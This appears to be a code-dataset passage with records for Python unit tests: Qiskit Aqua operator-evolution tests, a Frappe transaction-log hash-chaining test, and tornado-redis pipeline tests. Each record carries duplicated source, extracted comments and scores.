self.assertIn(p, circuit_params)
self.assertNotIn(thetas[0], circuit_params)
def test_bind_parameters(self):
""" bind parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
wf = wf.assign_parameters({thetas: np.arange(10, 16)})
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, circuit_params)
def test_bind_circuit_parameters(self):
""" bind circuit parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
evo = evolution.convert(wf)
mean = evo.assign_parameters({thetas: np.arange(10, 16)})
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, mean.to_circuit().parameters)
# Check that original circuit is unchanged
for p in thetas:
self.assertIn(p, evo.to_circuit().parameters)
# TODO test with other Op types than CircuitStateFn
def test_bind_parameter_list(self):
""" bind parameters list test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
evo = evolution.convert(wf)
param_list = np.transpose([np.arange(10, 16), np.arange(2, 8), np.arange(30, 36)]).tolist()
means = evo.assign_parameters({thetas: param_list})
self.assertIsInstance(means, ListOp)
# Check that the no parameters are in the circuit
for p in thetas[1:]:
for circop in means.oplist:
self.assertNotIn(p, circop.to_circuit().parameters)
# Check that original circuit is unchanged
for p in thetas:
self.assertIn(p, evo.to_circuit().parameters)
def test_qdrift(self):
""" QDrift test """
op = (2 * Z ^ Z) + (3 * X ^ X) - (4 * Y ^ Y) + (.5 * Z ^ I)
trotterization = QDrift().convert(op)
self.assertGreater(len(trotterization.oplist), 150)
last_coeff = None
# Check that all types are correct and all coefficients are equals
for op in trotterization.oplist:
self.assertIsInstance(op, (EvolvedOp, CircuitOp))
if isinstance(op, EvolvedOp):
if last_coeff:
self.assertEqual(op.primitive.coeff, last_coeff)
else:
last_coeff = op.primitive.coeff
def test_matrix_op_evolution(self):
""" MatrixOp evolution test """
# pylint: disable=no-member
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z) * np.pi/2
exp_mat = op.to_matrix_op().exp_i().to_matrix()
ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
np.testing.assert_array_almost_equal(ref_mat, exp_mat)
def test_log_i(self):
""" MatrixOp.log_i() test """
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z) * np.pi/2
# Test with CircuitOp
log_exp_op = op.to_matrix_op().exp_i().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with MatrixOp
log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with PauliOp
log_exp_op = op.to_matrix_op().exp_i().to_pauli_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with EvolvedOp
log_exp_op = op.exp_i().to_pauli_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with proper ListOp
op = ListOp([(0.39793742484318045 * I ^ Z),
(0.18093119978423156 * X ^ X),
(-0.39793742484318045 * Z ^ I),
(-0.01128010425623538 * Z ^ Z) * np.pi / 2])
log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
def test_matrix_op_parameterized_evolution(self):
""" parameterized MatrixOp evolution test """
# pylint: disable=no-member
theta = Parameter('θ')
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z)
op = op * theta
wf = (op.to_matrix_op().exp_i()) @ CX @ (H ^ I) @ Zero
self.assertIn(theta, wf.to_circuit().parameters)
op = op.assign_parameters({theta: 1})
exp_mat = op.to_matrix_op().exp_i().to_matrix()
ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
np.testing.assert_array_almost_equal(ref_mat, exp_mat)
wf = wf.assign_parameters({theta: 3})
self.assertNotIn(theta, wf.to_circuit().parameters)
def test_mixed_evolution(self):
""" bind parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * (I ^ Z).to_matrix_op()) + \
(thetas[2] * (X ^ X)).to_matrix_op() + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z).to_circuit_op() + \
(thetas[5] * (Z ^ I).to_circuit_op())
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
wf = wf.assign_parameters({thetas: np.arange(10, 16)})
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, circuit_params)
if __name__ == '__main__':
unittest.main()
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Evolution """
import unittest
from test.aqua import QiskitAquaTestCase
import numpy as np
import scipy.linalg
import qiskit
from qiskit.circuit import ParameterVector, Parameter
from qiskit.aqua.operators import (X, Y, Z, I, CX, H, ListOp, CircuitOp, Zero, EvolutionFactory,
EvolvedOp, PauliTrotterEvolution, QDrift)
# pylint: disable=invalid-name
class TestEvolution(QiskitAquaTestCase):
"""Evolution tests."""
def test_exp_i(self):
""" exponential of Pauli test """
op = Z.exp_i()
gate = op.to_circuit().data[0][0]
self.assertIsInstance(gate, qiskit.circuit.library.RZGate)
self.assertEqual(gate.params[0], 2)
def test_trotter_with_identity(self):
""" trotterization of operator with identity term """
op = (2.0 * I ^ I) + (Z ^ Y)
exact_matrix = scipy.linalg.expm(-1j * op.to_matrix())
evo = PauliTrotterEvolution(trotter_mode='suzuki', reps=2)
with self.subTest('all PauliOp terms'):
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
with self.subTest('MatrixOp identity term'):
op = (2.0 * I ^ I).to_matrix_op() + (Z ^ Y)
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
with self.subTest('CircuitOp identity term'):
op = (2.0 * I ^ I).to_circuit_op() + (Z ^ Y)
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
def test_pauli_evolution(self):
""" pauli evolution test """
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z)
evolution = EvolutionFactory.build(operator=op)
# wf = (Pl^Pl) + (Ze^Ze)
wf = ((np.pi / 2) * op).exp_i() @ CX @ (H ^ I) @ Zero
mean = evolution.convert(wf)
self.assertIsNotNone(mean)
def test_parameterized_evolution(self):
""" parameterized evolution test """
thetas = ParameterVector('θ', length=7)
op = (thetas[0] * I ^ I) + \
(thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = op * thetas[6]
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the non-identity parameters are in the circuit
for p in thetas[1:]:
self.assertIn(p, circuit_params)
self.assertNotIn(thetas[0], circuit_params)
def test_bind_parameters(self):
""" bind parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
wf = wf.assign_parameters({thetas: np.arange(10, 16)})
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, circuit_params)
def test_bind_circuit_parameters(self):
""" bind circuit parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
evo = evolution.convert(wf)
mean = evo.assign_parameters({thetas: np.arange(10, 16)})
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, mean.to_circuit().parameters)
# Check that original circuit is unchanged
for p in thetas:
self.assertIn(p, evo.to_circuit().parameters)
# TODO test with other Op types than CircuitStateFn
def test_bind_parameter_list(self):
""" bind parameters list test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
evo = evolution.convert(wf)
param_list = np.transpose([np.arange(10, 16), np.arange(2, 8), np.arange(30, 36)]).tolist()
means = evo.assign_parameters({thetas: param_list})
self.assertIsInstance(means, ListOp)
# Check that the no parameters are in the circuit
for p in thetas[1:]:
for circop in means.oplist:
self.assertNotIn(p, circop.to_circuit().parameters)
# Check that original circuit is unchanged
for p in thetas:
self.assertIn(p, evo.to_circuit().parameters)
def test_qdrift(self):
""" QDrift test """
op = (2 * Z ^ Z) + (3 * X ^ X) - (4 * Y ^ Y) + (.5 * Z ^ I)
trotterization = QDrift().convert(op)
self.assertGreater(len(trotterization.oplist), 150)
last_coeff = None
# Check that all types are correct and all coefficients are equals
for op in trotterization.oplist:
self.assertIsInstance(op, (EvolvedOp, CircuitOp))
if isinstance(op, EvolvedOp):
if last_coeff:
self.assertEqual(op.primitive.coeff, last_coeff)
else:
last_coeff = op.primitive.coeff
def test_matrix_op_evolution(self):
""" MatrixOp evolution test """
# pylint: disable=no-member
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z) * np.pi/2
exp_mat = op.to_matrix_op().exp_i().to_matrix()
ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
np.testing.assert_array_almost_equal(ref_mat, exp_mat)
def test_log_i(self):
""" MatrixOp.log_i() test """
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z) * np.pi/2
# Test with CircuitOp
log_exp_op = op.to_matrix_op().exp_i().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with MatrixOp
log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with PauliOp
log_exp_op = op.to_matrix_op().exp_i().to_pauli_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with EvolvedOp
log_exp_op = op.exp_i().to_pauli_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
# Test with proper ListOp
op = ListOp([(0.39793742484318045 * I ^ Z),
(0.18093119978423156 * X ^ X),
(-0.39793742484318045 * Z ^ I),
(-0.01128010425623538 * Z ^ Z) * np.pi / 2])
log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
def test_matrix_op_parameterized_evolution(self):
""" parameterized MatrixOp evolution test """
# pylint: disable=no-member
theta = Parameter('θ')
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z)
op = op * theta
wf = (op.to_matrix_op().exp_i()) @ CX @ (H ^ I) @ Zero
self.assertIn(theta, wf.to_circuit().parameters)
op = op.assign_parameters({theta: 1})
exp_mat = op.to_matrix_op().exp_i().to_matrix()
ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
np.testing.assert_array_almost_equal(ref_mat, exp_mat)
wf = wf.assign_parameters({theta: 3})
self.assertNotIn(theta, wf.to_circuit().parameters)
def test_mixed_evolution(self):
""" bind parameters test """
thetas = ParameterVector('θ', length=6)
op = (thetas[1] * (I ^ Z).to_matrix_op()) + \
(thetas[2] * (X ^ X)).to_matrix_op() + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z).to_circuit_op() + \
(thetas[5] * (Z ^ I).to_circuit_op())
op = thetas[0] * op
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
wf = wf.assign_parameters({thetas: np.arange(10, 16)})
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the no parameters are in the circuit
for p in thetas[1:]:
self.assertNotIn(p, circuit_params)
if __name__ == '__main__':
unittest.main()
|
en
| 0.739051
|
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. Test Evolution # pylint: disable=invalid-name Evolution tests. exponential of Pauli test trotterization of operator with identity term pauli evolution test # wf = (Pl^Pl) + (Ze^Ze) parameterized evolution test # wf = (Pl^Pl) + (Ze^Ze) # Check that the non-identity parameters are in the circuit bind parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit bind circuit parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit # Check that original circuit is unchanged # TODO test with other Op types than CircuitStateFn bind parameters list test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit # Check that original circuit is unchanged QDrift test # Check that all types are correct and all coefficients are equals MatrixOp evolution test # pylint: disable=no-member MatrixOp.log_i() test # Test with CircuitOp # Test with MatrixOp # Test with PauliOp # Test with EvolvedOp # Test with proper ListOp parameterized MatrixOp evolution test # pylint: disable=no-member bind parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit
| 1.99005
| 2
|
frappe/core/doctype/transaction_log/test_transaction_log.py
|
erpnext-tm/frappe
| 0
|
6627554
|
<filename>frappe/core/doctype/transaction_log/test_transaction_log.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import hashlib
import unittest
import frappe
test_records = []
class TestTransactionLog(unittest.TestCase):
def test_validate_chaining(self):
frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 1",
"data": "first_data",
}
).insert(ignore_permissions=True)
second_log = frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 2",
"data": "second_data",
}
).insert(ignore_permissions=True)
third_log = frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 3",
"data": "third_data",
}
).insert(ignore_permissions=True)
sha = hashlib.sha256()
sha.update(
frappe.safe_encode(str(third_log.transaction_hash))
+ frappe.safe_encode(str(second_log.chaining_hash))
)
self.assertEqual(sha.hexdigest(), third_log.chaining_hash)
|
<filename>frappe/core/doctype/transaction_log/test_transaction_log.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import hashlib
import unittest
import frappe
test_records = []
class TestTransactionLog(unittest.TestCase):
def test_validate_chaining(self):
frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 1",
"data": "first_data",
}
).insert(ignore_permissions=True)
second_log = frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 2",
"data": "second_data",
}
).insert(ignore_permissions=True)
third_log = frappe.get_doc(
{
"doctype": "Transaction Log",
"reference_doctype": "Test Doctype",
"document_name": "Test Document 3",
"data": "third_data",
}
).insert(ignore_permissions=True)
sha = hashlib.sha256()
sha.update(
frappe.safe_encode(str(third_log.transaction_hash))
+ frappe.safe_encode(str(second_log.chaining_hash))
)
self.assertEqual(sha.hexdigest(), third_log.chaining_hash)
|
en
| 0.718929
|
# -*- coding: utf-8 -*- # Copyright (c) 2018, Frappe Technologies and Contributors # See license.txt
| 2.203094
| 2
|
tornadoredis/tests/pipeline.py
|
jbochi/tornado-redis
| 1
|
6627555
|
#!/usr/bin/env python
from tornado import gen
from redistest import RedisTestCase, async_test
from tornadoredis.exceptions import ResponseError
class PipelineTestCase(RedisTestCase):
@async_test
@gen.engine
def test_pipe_simple(self):
pipe = self.client.pipeline()
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_error(self):
pipe = self.client.pipeline()
pipe.sadd('foo', 1)
pipe.sadd('foo', 2)
pipe.rpop('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res[:2], [1, 1])
self.assertIsInstance(res[2], ResponseError)
self.stop()
@async_test
@gen.engine
def test_two_pipes(self):
pipe = self.client.pipeline()
pipe.rpush('foo', '1')
pipe.rpush('foo', '2')
pipe.lrange('foo', 0, -1)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, 2, ['1', '2']])
pipe.sadd('bar', '3')
pipe.sadd('bar', '4')
pipe.smembers('bar')
pipe.scard('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [1, 1, set(['3', '4']), 2])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe(self):
pipe = self.client.pipeline()
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_pipe_watch(self):
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'bar', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['zar', ])
self.stop()
@async_test
@gen.engine
def test_pipe_watch2(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'foo', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [])
self.stop()
@async_test
@gen.engine
def test_pipe_unwatch(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'foo', 'zar')
self.assertTrue(res)
res = yield gen.Task(self.client.unwatch)
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['zar'])
self.stop()
@async_test
@gen.engine
def test_pipe_zsets(self):
pipe = self.client.pipeline(transactional=True)
pipe.zadd('foo', 1, 'a')
pipe.zadd('foo', 2, 'b')
pipe.zscore('foo', 'a')
pipe.zscore('foo', 'b')
pipe.zrank('foo', 'a',)
pipe.zrank('foo', 'b',)
pipe.zrange('foo', 0, -1, True)
pipe.zrange('foo', 0, -1, False)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
1, 1,
1, 2,
0, 1,
[('a', 1.0), ('b', 2.0)],
['a', 'b'],
])
self.stop()
@async_test
@gen.engine
def test_pipe_zsets2(self):
pipe = self.client.pipeline(transactional=False)
pipe.zadd('foo', 1, 'a')
pipe.zadd('foo', 2, 'b')
pipe.zscore('foo', 'a')
pipe.zscore('foo', 'b')
pipe.zrank('foo', 'a',)
pipe.zrank('foo', 'b',)
pipe.zrange('foo', 0, -1, True)
pipe.zrange('foo', 0, -1, False)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
1, 1,
1, 2,
0, 1,
[('a', 1.0), ('b', 2.0)],
['a', 'b'],
])
self.stop()
@async_test
@gen.engine
def test_pipe_hsets(self):
pipe = self.client.pipeline(transactional=True)
pipe.hset('foo', 'bar', 'aaa')
pipe.hset('foo', 'zar', 'bbb')
pipe.hgetall('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
True,
True,
{'bar': 'aaa', 'zar': 'bbb'}
])
self.stop()
@async_test
@gen.engine
def test_pipe_hsets2(self):
pipe = self.client.pipeline(transactional=False)
pipe.hset('foo', 'bar', 'aaa')
pipe.hset('foo', 'zar', 'bbb')
pipe.hgetall('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
True,
True,
{'bar': 'aaa', 'zar': 'bbb'}
])
self.stop()
@async_test
@gen.engine
def test_response_error(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.llen, 'foo')
self.assertIsInstance(res, ResponseError)
self.stop()
|
#!/usr/bin/env python
from tornado import gen
from redistest import RedisTestCase, async_test
from tornadoredis.exceptions import ResponseError
class PipelineTestCase(RedisTestCase):
@async_test
@gen.engine
def test_pipe_simple(self):
pipe = self.client.pipeline()
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_error(self):
pipe = self.client.pipeline()
pipe.sadd('foo', 1)
pipe.sadd('foo', 2)
pipe.rpop('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res[:2], [1, 1])
self.assertIsInstance(res[2], ResponseError)
self.stop()
@async_test
@gen.engine
def test_two_pipes(self):
pipe = self.client.pipeline()
pipe.rpush('foo', '1')
pipe.rpush('foo', '2')
pipe.lrange('foo', 0, -1)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, 2, ['1', '2']])
pipe.sadd('bar', '3')
pipe.sadd('bar', '4')
pipe.smembers('bar')
pipe.scard('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [1, 1, set(['3', '4']), 2])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe(self):
pipe = self.client.pipeline()
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_pipe_watch(self):
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'bar', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['zar', ])
self.stop()
@async_test
@gen.engine
def test_pipe_watch2(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'foo', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [])
self.stop()
@async_test
@gen.engine
def test_pipe_unwatch(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'foo', 'zar')
self.assertTrue(res)
res = yield gen.Task(self.client.unwatch)
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['zar'])
self.stop()
@async_test
@gen.engine
def test_pipe_zsets(self):
pipe = self.client.pipeline(transactional=True)
pipe.zadd('foo', 1, 'a')
pipe.zadd('foo', 2, 'b')
pipe.zscore('foo', 'a')
pipe.zscore('foo', 'b')
pipe.zrank('foo', 'a',)
pipe.zrank('foo', 'b',)
pipe.zrange('foo', 0, -1, True)
pipe.zrange('foo', 0, -1, False)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
1, 1,
1, 2,
0, 1,
[('a', 1.0), ('b', 2.0)],
['a', 'b'],
])
self.stop()
@async_test
@gen.engine
def test_pipe_zsets2(self):
pipe = self.client.pipeline(transactional=False)
pipe.zadd('foo', 1, 'a')
pipe.zadd('foo', 2, 'b')
pipe.zscore('foo', 'a')
pipe.zscore('foo', 'b')
pipe.zrank('foo', 'a',)
pipe.zrank('foo', 'b',)
pipe.zrange('foo', 0, -1, True)
pipe.zrange('foo', 0, -1, False)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
1, 1,
1, 2,
0, 1,
[('a', 1.0), ('b', 2.0)],
['a', 'b'],
])
self.stop()
@async_test
@gen.engine
def test_pipe_hsets(self):
pipe = self.client.pipeline(transactional=True)
pipe.hset('foo', 'bar', 'aaa')
pipe.hset('foo', 'zar', 'bbb')
